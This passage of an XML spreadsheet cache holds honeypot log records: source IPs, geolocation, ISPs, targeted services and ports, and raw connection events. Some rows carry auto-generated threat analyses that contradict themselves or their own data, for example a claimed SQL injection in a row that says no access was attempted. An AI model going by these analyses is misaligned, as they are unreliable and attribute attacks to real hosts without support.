    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:42bc"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="439"/>
    <x v="439"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T12:13:14"/>
    <d v="2025-04-29T12:13:14"/>
    <d v="2025-04-29T12:13:14"/>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d1:5d1f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="440"/>
    <x v="440"/>
    <s v="host-176-36-63-102.b024.la.net.ua&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T12:11:09"/>
    <d v="2025-02-14T03:16:12"/>
    <d v="2025-04-29T12:11:09"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="39608"/>
    <s v="Lanet Network Ltd"/>
    <s v="Lanet Network"/>
    <s v="business"/>
    <s v="Lanet Network Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b024:3f66"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="441"/>
    <x v="441"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T12:02:28"/>
    <d v="2024-12-21T06:07:01"/>
    <d v="2025-04-29T12:02:28"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Karur"/>
    <s v="Karur"/>
    <s v="1267648"/>
    <s v="639001"/>
    <s v="10.9601"/>
    <s v="78.0766"/>
    <s v="134918"/>
    <s v="Blue Net It Soltions Pvt Ltd"/>
    <s v="Blue Net It Solutions Pvt Ltd"/>
    <s v="business"/>
    <s v="Blue Net It Solutions Pvt Ltd"/>
    <s v="2016-03-03"/>
    <s v="BLUENET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,50016)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,52840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60049)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60602)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,59017)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,59744)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60654)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d2:ce1a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A suspicious incoming SMB connection from IP address 103.210.206.26, potentially attempting to access the system or steal sensitive data. This may be a sign of a ransomware or malware attack. The source IP has an unusual port number (60654), indicating possible malicious intent. &amp;&amp; Possible malicious activity detected, an incoming SMB connection from unknown IP address 103.210.206.26 to port 60654. This could be a scanning attempt or a potential malware transmission. Further analysis is required to confirm the nature of this activity."/>
    <s v="SMB Scanning &amp;&amp; SMB Bruteforce"/>
  </r>
  <r>
    <x v="442"/>
    <x v="442"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T11:37:04"/>
    <d v="2025-04-29T11:37:04"/>
    <d v="2025-04-29T11:37:04"/>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d6:4ee3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No incoming connection attempts for Telnet service were recorded. This suggests that malicious actors did not target this specific service during the monitoring period. The absence of any activity indicates no attempted exploitation or scanning occurred via Telnet. &amp;&amp; No TELNET activity detected in this log entry, suggesting that potential malicious scans or attempts to exploit vulnerabilities related to TELNET services may have been blocked. _x000a_This absence of TELNET activity could indicate a defensive measure against unwanted access attempts._x000a_The lack of TELNET interaction in the data might also imply an ongoing monitoring and filtering process to prevent unauthorized connections."/>
    <m/>
  </r>
  <r>
    <x v="443"/>
    <x v="443"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T11:22:20"/>
    <d v="2025-04-29T10:49:01"/>
    <d v="2025-04-29T11:22:20"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:dd0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="444"/>
    <x v="444"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T11:11:10"/>
    <d v="2024-12-18T19:29:06"/>
    <d v="2025-04-29T11:11:10"/>
    <n v="240"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H40"/>
    <s v="41941&amp;&amp;6667&amp;&amp;48604&amp;&amp;443&amp;&amp;56261&amp;&amp;53807&amp;&amp;445&amp;&amp;55401&amp;&amp;1433&amp;&amp;110&amp;&amp;21&amp;&amp;25&amp;&amp;389&amp;&amp;48318&amp;&amp;5432&amp;&amp;3306&amp;&amp;9100&amp;&amp;6379&amp;&amp;1080&amp;&amp;1521&amp;&amp;8443&amp;&amp;41324&amp;&amp;47217&amp;&amp;58528&amp;&amp;53464&amp;&amp;55205&amp;&amp;NA&amp;&amp;56853&amp;&amp;42720&amp;&amp;57481"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.2297"/>
    <s v="21.0122"/>
    <s v="47154"/>
    <s v="HUSAM A. H. HIJAZI"/>
    <s v="Husam A. H. Hijazi"/>
    <s v="business"/>
    <s v="Dedires"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '38.54.63.23:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '154.93.37.45:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '103.211.202.140:8443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '185.255.123.181:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9b:5b82"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <s v="There is no log data provided to analyze."/>
  </r>
  <r>
    <x v="445"/>
    <x v="445"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T11:09:23"/>
    <d v="2025-04-29T11:09:23"/>
    <d v="2025-04-29T11:09:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:5d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="446"/>
    <x v="446"/>
    <s v="node-crw.pool-1-4.dynamic.nt-isp.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T11:02:32"/>
    <d v="2025-04-29T10:42:09"/>
    <d v="2025-04-29T11:02:32"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Chatuchak"/>
    <s v="Chatuchak"/>
    <s v="7026785"/>
    <s v="NA"/>
    <s v="13.8289"/>
    <s v="100.56"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="residential"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:104:c0ac"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="447"/>
    <x v="447"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T10:08:41"/>
    <d v="2025-04-29T10:08:41"/>
    <d v="2025-04-29T10:08:41"/>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d6:88aa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected for TELNET service. This could indicate that either the honeypot is inactive or not receiving any traffic for this particular service. Normal behavior would be to see some level of activity if it's online and active. &amp;&amp; Possible malicious activity: No log entry was recorded for Telnet service indicating no login or connection attempt was detected, which may suggest that the malicious actor did not try to access this specific service. _x000a_This lack of activity might indicate a targeted attack, where the attacker avoided detection by this particular method. _x000a_Alternatively, it could simply be an error in logging."/>
    <s v="Telnet Brute &amp;&amp; Telnet Scan"/>
  </r>
  <r>
    <x v="448"/>
    <x v="448"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T10:06:32"/>
    <d v="2025-04-29T10:06:32"/>
    <d v="2025-04-29T10:06:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="24560"/>
    <s v="AIRTELBROADBAND-AS-AP"/>
    <s v="Bharti Airtel"/>
    <s v="corporate"/>
    <s v="Bharti Airtel Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfb9:8198"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No attempt was made to access Microsoft SQL database, likely indicating a reconnaissance activity or probing for vulnerabilities. &amp;&amp; Data indicates an attempted SQL injection, potentially exploiting a vulnerability in a Microsoft SQL Server application to gain unauthorized access or extract sensitive information. The lack of data suggests the attacker may be probing for vulnerabilities before launching a full-scale attack. This could be the initial step in a larger malicious operation."/>
    <s v="SQL Attack &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="449"/>
    <x v="449"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T10:02:15"/>
    <d v="2024-12-05T13:09:24"/>
    <d v="2025-04-29T10:02:15"/>
    <n v="42"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H39"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay-Static"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53888)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53933)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53934)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54015)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54062)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54063)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,58520)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,59043)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,60183)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,60258)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,61556)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:332b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="450"/>
    <x v="450"/>
    <s v="NA"/>
    <x v="5"/>
    <d v="2025-04-29T09:44:14"/>
    <d v="2024-02-28T09:18:48"/>
    <d v="2025-04-29T09:44:14"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H8&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="35883&amp;&amp;NA&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown']}"/>
    <n v="42"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PB"/>
    <s v="Paraíba"/>
    <s v="Guarabira"/>
    <s v="Guarabira"/>
    <s v="3398570"/>
    <s v="NA"/>
    <s v="-6.85472"/>
    <s v="-35.49"/>
    <s v="270458"/>
    <s v="Agility Telecom"/>
    <s v="Agility Telecom"/>
    <s v="business"/>
    <s v="Fibra Mais"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c806:5b2d"/>
    <s v="None&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="451"/>
    <x v="451"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:33:11"/>
    <d v="2025-04-29T09:33:11"/>
    <d v="2025-04-29T09:33:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Dadar West)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.0211"/>
    <s v="72.8305"/>
    <s v="4755"/>
    <s v="TATACOMM-AS"/>
    <s v="Tata Communications Limited"/>
    <s v="corporate"/>
    <s v="Tata Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e8c:d162"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="452"/>
    <x v="452"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:20:31"/>
    <d v="2024-07-01T10:18:00"/>
    <d v="2025-04-29T09:20:31"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="43714&amp;&amp;23&amp;&amp;NA&amp;&amp;56914"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Mười Một"/>
    <s v="Quận Mười Một (Binh Tri Dong B)"/>
    <s v="9645084"/>
    <s v="NA"/>
    <s v="10.7479"/>
    <s v="106.608"/>
    <s v="135932"/>
    <s v="Viet Storage Technology Joint Stock Company"/>
    <s v="HYPERCORE"/>
    <s v="business"/>
    <s v="Hypercore Technology Joint Stock Company"/>
    <s v="2023-01-17"/>
    <s v="HYPERCORE-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6746:c09"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Based on the data, it appears that an attacker is attempting to scan and exploit various services on a network, likely for reconnaissance or malicious purposes. &amp;&amp; No log data provided to analyze. &amp;&amp; There is insufficient log data to analyze for possible malicious activity. No notable patterns or anomalies are detected from this information. No evidence of suspicious behavior or threats is present in the given data."/>
    <s v="The attacker seems to be trying to identify vulnerabilities in different protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is also trying to authenticate with valid credentials on some services."/>
  </r>
  <r>
    <x v="453"/>
    <x v="453"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T09:13:24"/>
    <d v="2025-04-29T09:13:24"/>
    <d v="2025-04-29T09:13:24"/>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1:e6ec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
